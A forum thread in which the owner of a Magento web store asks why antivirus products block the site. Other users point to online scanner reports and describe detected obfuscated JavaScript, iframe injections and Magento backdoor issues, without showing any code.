Need help with "MALICIOUS URL BLOCKED"

Hi

Our website has been blocked by avast and we have no idea why! Url is wxw.fluffheaven.com

This is causing us a lot of issues as a lot of our clients can’t get on.

Are we missing something obvious?

Thanks for your help, we are desperate to sort this out.

Have run through http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fwww.fluffheaven.com and all seems fine?

it is in Bitdefender block list, and CleanMX has it suspicious
https://www.virustotal.com/en/url/4e983c9e46d72983f7d9a61c4c36996a2c1a63641579bf9a12ef70b5f75f3b8c/analysis/1376660965/

IDS alert from Suricata filter. http://urlquery.net/report.php?id=4587636

Zulu say malicious URL. http://zulu.zscaler.com/submission/show/d84deee463df2b9efe4963d2ca69d58f-1376661374

quttera say suspicious. http://quttera.com/detailed_report/fluffheaven.com

Thanks for those links, off to investigate.

What would cause the biddefender block?

guess you need to ask Bitdefender…

It has Malware on it due to Bitdefender: http://trafficlight.bitdefender.com/info?url=www.fluffheaven.com&language=en_US

There are 18 potentially suspicious files: http://www.quttera.com/detailed_report/www.fluffheaven.com

URLQuery: http://urlquery.net/report.php?id=4587915

Hi Steven Winderlich,

Why did you recapitulate an earlier posting in the threat? Or didn’t tyou noticde?

polonus

I havent noticed that, sorry… :smiley:

We have cleaned up the issues listed on quttera, no idea about bit defender. No idea what they think is the cause. Lodged a query on their forum so hoping we get some help.

Thanks for the help guys

The IDS alert comes in the web client rules classification. It is an “overflow exploit” rule that is being flagged in this case.
The potentially suspicious files all have eval packed as initialization of function pointer to JavaScript method fromCharCode
But this should come to play in combination with an iFrame:
http://www.quttera.com/detailed_report/www.fluffheaven.com#ReportTabPotSusp

The plot thickens on this one!

Fluffheaven is a magento install, in total 4 sites are on the same magento installation and same hosting. Fluffheavens results above

babame.com - comes up completely clean on https://www.virustotal.com/en/url/001d48f5312d4fff76d6f0ec5aa798585f910d6f4f05f53e3a2dd51888dcbde7/analysis/ but avast is blocking it

babatoys.co.uk - comes up with 2 issues on bitdefender and kaspersky, https://www.virustotal.com/en/url/23634f97521604508d3bea6974718ca40effb4a63a1e226cd5be1cf30d32aed0/analysis/

bababump.com is the same as babatoys - 2 issues https://www.virustotal.com/en/url/3c3f6e803024856ff37056ee6e15a3760550aff3d155f8a9fd9fd53b8befe6db/analysis/1376675497/

Hositng company are in the middle of running a maldet scan on the server, so far clean but still running.

Why would 4 sites, all the same database throw up such varying results!

Polonus I think we have now removed that code/frames and quttera.com showing ok now on re scan.

Magento recently had to be updated. Avast! Web Shield is even alerting on this link for the malicious code on the magento website: htxp://stackoverflow.com/questions/13822419/clients-magento-website-contains-malicious-code-how-to-get-rid-of-it as infested with JS:iFrame-AGU[Trj]
This also played in May of this year and later so recently - Magento store can be hacked due to compromised FTP credentials, an insecure web host, a vulnerable extension, a weak password, or an outdated Magento installation. → http://blog.sucuri.net/2012/07/magento-security-update-1-7-0-2-zend_xmlrpc-vulnerability.html (also flagged by avast! Webshield as PHP:Backdoor-BG[Trj]

polonus